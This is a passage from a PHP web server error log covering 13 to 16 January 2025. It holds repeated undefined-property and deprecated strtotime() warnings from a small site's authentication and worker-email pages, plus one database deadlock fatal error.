/home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [13-Jan-2025 11:26:25 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [13-Jan-2025 11:27:16 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [13-Jan-2025 11:27:37 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [13-Jan-2025 11:27:59 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [13-Jan-2025 11:28:10 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [13-Jan-2025 11:28:27 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [13-Jan-2025 11:32:23 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [13-Jan-2025 22:01:46 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [13-Jan-2025 22:30:23 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [13-Jan-2025 22:31:47 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [13-Jan-2025 22:31:59 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [13-Jan-2025 22:32:11 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [13-Jan-2025 22:49:48 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [13-Jan-2025 22:50:13 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [14-Jan-2025 00:14:22 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [14-Jan-2025 00:14:37 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [14-Jan-2025 00:14:50 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [14-Jan-2025 00:14:57 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [14-Jan-2025 00:49:10 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [14-Jan-2025 00:49:55 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [14-Jan-2025 00:50:59 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [14-Jan-2025 02:24:57 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [14-Jan-2025 02:25:29 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [14-Jan-2025 02:25:57 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [14-Jan-2025 03:30:44 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [14-Jan-2025 03:52:48 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [14-Jan-2025 05:29:43 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [14-Jan-2025 05:31:58 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [14-Jan-2025 05:59:35 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [14-Jan-2025 06:14:22 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [14-Jan-2025 06:32:02 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [14-Jan-2025 11:25:00 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [14-Jan-2025 11:25:46 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [14-Jan-2025 11:25:54 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [14-Jan-2025 11:30:29 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [14-Jan-2025 11:30:45 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [14-Jan-2025 11:31:01 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [14-Jan-2025 11:31:10 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [14-Jan-2025 11:34:47 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [14-Jan-2025 11:34:55 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [14-Jan-2025 11:35:28 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [14-Jan-2025 11:35:50 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [14-Jan-2025 11:35:59 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [14-Jan-2025 11:36:13 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [14-Jan-2025 20:40:41 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [14-Jan-2025 20:41:36 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [14-Jan-2025 20:42:21 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [14-Jan-2025 20:42:33 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [14-Jan-2025 20:43:03 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [14-Jan-2025 20:43:17 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [14-Jan-2025 20:43:43 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [14-Jan-2025 20:43:57 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [14-Jan-2025 20:44:08 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [14-Jan-2025 20:44:22 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [14-Jan-2025 21:33:37 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [14-Jan-2025 21:47:18 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [14-Jan-2025 21:48:55 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [14-Jan-2025 21:49:23 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [14-Jan-2025 21:49:51 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [14-Jan-2025 21:50:58 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [14-Jan-2025 22:39:37 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [14-Jan-2025 23:37:13 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [14-Jan-2025 23:37:45 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [14-Jan-2025 23:40:21 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [14-Jan-2025 23:40:51 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [15-Jan-2025 00:00:05 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [15-Jan-2025 00:42:45 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [15-Jan-2025 00:53:36 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [15-Jan-2025 01:08:53 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [15-Jan-2025 01:10:03 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [15-Jan-2025 01:10:20 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [15-Jan-2025 01:11:24 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [15-Jan-2025 01:21:11 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [15-Jan-2025 01:21:48 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [15-Jan-2025 01:24:10 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [15-Jan-2025 01:24:22 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [15-Jan-2025 01:24:41 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [15-Jan-2025 01:24:56 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [15-Jan-2025 01:25:52 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [15-Jan-2025 01:27:37 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [15-Jan-2025 01:27:58 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [15-Jan-2025 01:28:14 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [15-Jan-2025 01:29:17 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [15-Jan-2025 01:30:50 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [15-Jan-2025 01:31:40 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [15-Jan-2025 01:31:55 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [15-Jan-2025 01:32:07 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [15-Jan-2025 01:32:18 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [15-Jan-2025 01:32:40 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [15-Jan-2025 01:32:56 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [15-Jan-2025 01:34:14 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [15-Jan-2025 01:51:48 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [15-Jan-2025 02:15:20 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [15-Jan-2025 02:39:37 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [15-Jan-2025 03:30:31 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [15-Jan-2025 04:11:11 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [15-Jan-2025 04:32:03 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [15-Jan-2025 04:46:57 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [15-Jan-2025 04:48:14 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [15-Jan-2025 05:13:17 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [15-Jan-2025 05:23:02 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [15-Jan-2025 05:33:52 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [15-Jan-2025 05:35:30 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [15-Jan-2025 05:35:40 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [15-Jan-2025 05:35:51 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [15-Jan-2025 05:58:17 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [15-Jan-2025 05:58:22 UTC] PHP Warning: Undefined array key "schoolName" in /home/emeraadmin/public_html/pages/submit_form.php on line 11 [15-Jan-2025 05:58:22 UTC] PHP Warning: Undefined array key "date" in /home/emeraadmin/public_html/pages/submit_form.php on line 12 [15-Jan-2025 05:58:22 UTC] PHP Warning: Undefined array key "time" in /home/emeraadmin/public_html/pages/submit_form.php on line 13 [15-Jan-2025 05:58:22 UTC] PHP Warning: Undefined array key "latitude" in /home/emeraadmin/public_html/pages/submit_form.php on line 20 [15-Jan-2025 05:58:22 UTC] PHP Warning: Undefined array key "longitude" in /home/emeraadmin/public_html/pages/submit_form.php on line 21 [15-Jan-2025 06:01:43 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [15-Jan-2025 06:43:56 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [15-Jan-2025 06:50:18 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [15-Jan-2025 07:07:04 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [15-Jan-2025 09:10:56 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [15-Jan-2025 09:11:29 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [15-Jan-2025 09:12:07 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [15-Jan-2025 09:12:28 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [15-Jan-2025 09:13:15 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [15-Jan-2025 09:13:26 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [15-Jan-2025 09:13:37 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [15-Jan-2025 09:15:18 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [15-Jan-2025 09:15:26 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [15-Jan-2025 09:16:58 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [15-Jan-2025 09:17:07 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [15-Jan-2025 10:41:59 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [15-Jan-2025 10:42:16 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [15-Jan-2025 10:42:25 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [15-Jan-2025 10:42:34 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [15-Jan-2025 10:43:07 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [15-Jan-2025 21:01:05 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [15-Jan-2025 21:41:50 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [15-Jan-2025 21:50:17 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [15-Jan-2025 22:18:03 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [15-Jan-2025 22:59:01 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [15-Jan-2025 22:59:07 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [15-Jan-2025 23:00:00 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [15-Jan-2025 23:02:10 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [15-Jan-2025 23:13:19 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [15-Jan-2025 23:39:31 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [16-Jan-2025 00:12:14 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [16-Jan-2025 00:32:15 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [16-Jan-2025 01:00:47 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [16-Jan-2025 01:10:43 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [16-Jan-2025 01:55:50 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [16-Jan-2025 02:05:21 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [16-Jan-2025 02:49:53 UTC] PHP Fatal error: Uncaught PDOException: SQLSTATE[40001]: Serialization failure: 1213 Deadlock found when trying to get lock; try restarting transaction in /home/emeraadmin/public_html/Classes/Database.php:78 Stack trace: #0 /home/emeraadmin/public_html/Classes/Database.php(78): PDOStatement->execute() #1 /home/emeraadmin/public_html/Service/TaskFormService.php(32): Database->execute() #2 /home/emeraadmin/public_html/pages/submit_form.php(40): TaskFormService->insertTaskForm(Object(TaskForm)) #3 {main} thrown in /home/emeraadmin/public_html/Classes/Database.php on line 78 [16-Jan-2025 02:52:39 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [16-Jan-2025 03:09:15 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [16-Jan-2025 03:30:38 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [16-Jan-2025 03:37:50 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [16-Jan-2025 03:40:03 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [16-Jan-2025 03:54:15 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [16-Jan-2025 04:04:09 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [16-Jan-2025 05:35:59 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [16-Jan-2025 05:52:36 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [16-Jan-2025 06:42:26 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [16-Jan-2025 07:22:15 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [16-Jan-2025 08:58:12 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [16-Jan-2025 09:23:36 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [16-Jan-2025 09:23:36 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [16-Jan-2025 09:24:20 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [16-Jan-2025 09:41:11 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [16-Jan-2025 09:41:32 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [16-Jan-2025 09:42:14 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [16-Jan-2025 09:42:27 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [16-Jan-2025 09:45:31 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [16-Jan-2025 09:45:43 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [16-Jan-2025 09:45:58 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [16-Jan-2025 09:46:17 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [16-Jan-2025 09:46:25 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [16-Jan-2025 09:46:59 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [16-Jan-2025 09:57:06 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [16-Jan-2025 09:57:29 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [16-Jan-2025 09:57:47 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [16-Jan-2025 09:57:56 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [16-Jan-2025 09:58:05 UTC] PHP Deprecated: strtotime(): 